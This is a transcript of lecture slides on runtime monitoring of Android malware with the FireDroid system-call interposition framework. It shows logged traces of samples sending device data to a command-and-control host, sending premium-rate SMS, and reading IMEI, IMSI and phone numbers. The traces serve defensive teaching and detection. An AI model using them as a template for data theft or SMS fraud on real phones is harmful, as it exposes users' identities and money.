Presentation is loading. Please wait.

Presentation is loading. Please wait.

Monitoring Malware at Runtime. From Last Lecture Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of.

Published byFelicity Allison Modified over 8 years ago

Similar presentations

Presentation on theme: "Monitoring Malware at Runtime. From Last Lecture Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of."— Presentation transcript:

1 Monitoring Malware at Runtime

2 From Last Lecture Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of software AVS is lagging behind Low detection rate on new malware Large exposure window before updating DB Main issue: rely only on app signature What we need is a tool to detect runtime behaviour

3 FireDroid Our group is developing a new Android Security framework FireDroid is capable of monitoring app execution and enforcing security policies No need of modifying Android OS code! Only modification is to insert a line of text in the init.rc file FireDroid enables us to monitor system call execution of apps (and malware)

4 System Call Interposition System calls are used by apps to interact with the kernel By intercepting sensitive system calls we can enforce security policies to better protect Android We can use FireDroid also to provide us information about the system call executed by apps

5 Malware Genome Project Collection of 2GB of malware samples We have executed some of these samples within FireDroid sandbox In the following, we are going to see some more details After the semester break, Daniel will provide a live demo

6 Plankton Communication with a C&C server Sends some info when the installation is complete Together with some setting of the phone

7 Opening a socket [1743] syscall=socket(281) domain:PF INET6 type:SOCK STREAM protocol:IPPROTO IP ****************************** [1743] syscall=bind(282) socket: socket:[26088] sa family = AF INET6 port = 0 address = :: ****************************** [1743] syscall=connect(283) socket: socket:[26088] sa family = AF INET6 port = 80 address = 208.93.141.140 ******************************

8 Establishing a connection [****************************** [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168 data: POST /ProtocolGW/installation HTTP/1.1 Content-Length: 1426 Content-Type: application/x-www-form-urlencoded Host: www.searchwebmobile.com Connection: Keep-Alive ****************************** [1743] syscall=sendto(290) socket:socket:[26088] Connected Socket! data len: 1024 data: action=get&applicationId=325842969&developerId=752469853& deviceId=000000000000000&currentVersion=-1&permissions=android…..

9 FakePlayer The main activity is to send SMS It will get the handler for the SMS service from the Service Manager Then sends SMS to premium number (7132) with different subscription codes

10 Sending SMS [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC _MGR _GET _SERVICE service name = isms data size = 80 ****************************** [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) data size = 128 Destination: 7132 SMS Body: 849321

11 AnserverBot Retrieves information from the Telephony services Telephone number International Mobile Station Equipment Identity (IMEI) International Mobile Subscriber Identity (IMSI) This info is quite sensitive because it specifically points at YOU!

12 Getting the PhoneSubInfo Service [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC MGR GET SERVICE service name = iphonesubinfo ****************************** [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 5 data size = 100 data in text format: code 5: getLineNumber: Retrieves the phone number string for line 1

13 Getting More Info ****************************** … code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones. ****************************** … code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable. ****************************** … code 2: getDeviceSvn: Retrieves the software version number for the device, e.g., IMEI/SV for GSM phones. ****************************** … code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.

14 AnserverBot Fetching from Baidu ****************************** [1639] syscall=connect(283) socket: socket:[57270] sa family = AF INET6 port = 80 address = 220.181.111.147 ****************************** [1639] syscall=sendto(290) socket: socket:[57270] Connected Socket! data len: 153 data: GET / HTTP/1.1 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M Host: www.baidu.com Connection: Keep-Alive Accept-Encoding: gzip

15 AnserverBot Fetching from Baidu [1639] syscall=recvfrom(292) socket: socket:[57270] Connected Socket! data len: 128 data: HTTP/1.1 200 OK^M Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1; max-age=31536000; expires=Tue, 29-Oct-13 01:17:10 GM ****************************** [1639] syscall=recvfrom(292) :00:00 GMT; path=/; domain=.baidu.com^M P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M Cache-Control: no-cache^M Content-type: text/html ******************************

16 Questions?

Download ppt "Monitoring Malware at Runtime. From Last Lecture Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of."

Similar presentations

Android Application Development A Tutorial Driven Course.

Android Application Development A Tutorial Driven Course.
Aurasium: Practical Policy Enforcement for Android Applications

Aurasium: Practical Policy Enforcement for Android Applications
FireDroid: Hardening Security in Almost-Stock Android Giovanni Russello, Arturo Blas Jimenez, Habib Naderi, Wannes van der Mark 1 University of Auckland,

FireDroid: Hardening Security in Almost-Stock Android Giovanni Russello, Arturo Blas Jimenez, Habib Naderi, Wannes van der Mark 1 University of Auckland,
CC4100 Active Cellular Intercept Technologies

CC4100 Active Cellular Intercept Technologies
Dissecting Android Malware : Characterization and Evolution

Dissecting Android Malware : Characterization and Evolution
Aurasium: Practical Policy Enforcement for Android Applications By Yaoqi USENIX Security Symposium 2012.

Aurasium: Practical Policy Enforcement for Android Applications By Yaoqi USENIX Security Symposium 2012.
Policy Weaving for Mobile Devices Drew Davidson. Smartphone security is critical – 1200 to 1400 US Army troops to be equipped with Android smartphones.

Policy Weaving for Mobile Devices Drew Davidson. Smartphone security is critical – 1200 to 1400 US Army troops to be equipped with Android smartphones.
Android Malware Characterisaion. Android Under Attack Android Malware is on the rise In 2012 malware presence has increased by 580% compared to the same.

Android Malware Characterisaion. Android Under Attack Android Malware is on the rise In 2012 malware presence has increased by 580% compared to the same.
Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson Presented By: Rajat Khandelwal – 2009CS10209 Parikshit.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson Presented By: Rajat Khandelwal – 2009CS10209 Parikshit.
Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.
1 HTTP and some other odds and ends Nelson Padua-Perez Bill Pugh Department of Computer Science University of Maryland, College Park.

1 HTTP and some other odds and ends Nelson Padua-Perez Bill Pugh Department of Computer Science University of Maryland, College Park.
TCP/IP Protocol Suite 1 Chapter 22 Upon completion you will be able to: World Wide Web: HTTP Know how HTTP accesses data on the WWW Objectives.

TCP/IP Protocol Suite 1 Chapter 22 Upon completion you will be able to: World Wide Web: HTTP Know how HTTP accesses data on the WWW Objectives.
Definitions, Definitions, Definitions Lead to Understanding.

Definitions, Definitions, Definitions Lead to Understanding.
IBM Security Network Protection (XGS)

IBM Security Network Protection (XGS)
© 2012 IBM Corporation IBM Security Systems 1 © 2014 IBM Corporation IBM Security Network Protection (XGS) Advanced Threat Protection Integration Framework.

© 2012 IBM Corporation IBM Security Systems 1 © 2014 IBM Corporation IBM Security Network Protection (XGS) Advanced Threat Protection Integration Framework.
Lecture 4: stateful inspection, advanced protocols Roei Ben-Harush 2015.

Lecture 4: stateful inspection, advanced protocols Roei Ben-Harush 2015.
Android Security Enforcement and Refinement. Android Applications --- Example Example of location-sensitive social networking application for mobile phones.

Android Security Enforcement and Refinement. Android Applications --- Example Example of location-sensitive social networking application for mobile phones.
CS 153 Design of Operating Systems Spring 2015 Lecture 24: Android OS.

CS 153 Design of Operating Systems Spring 2015 Lecture 24: Android OS.
Presentation By Deepak Katta

Presentation By Deepak Katta
Understanding Android Security Yinshu Wu William Enck, Machigar Ongtang, and PatrickMcDaniel Pennsylvania State University.

Understanding Android Security Yinshu Wu William Enck, Machigar Ongtang, and PatrickMcDaniel Pennsylvania State University.

Similar presentations

Ads by Google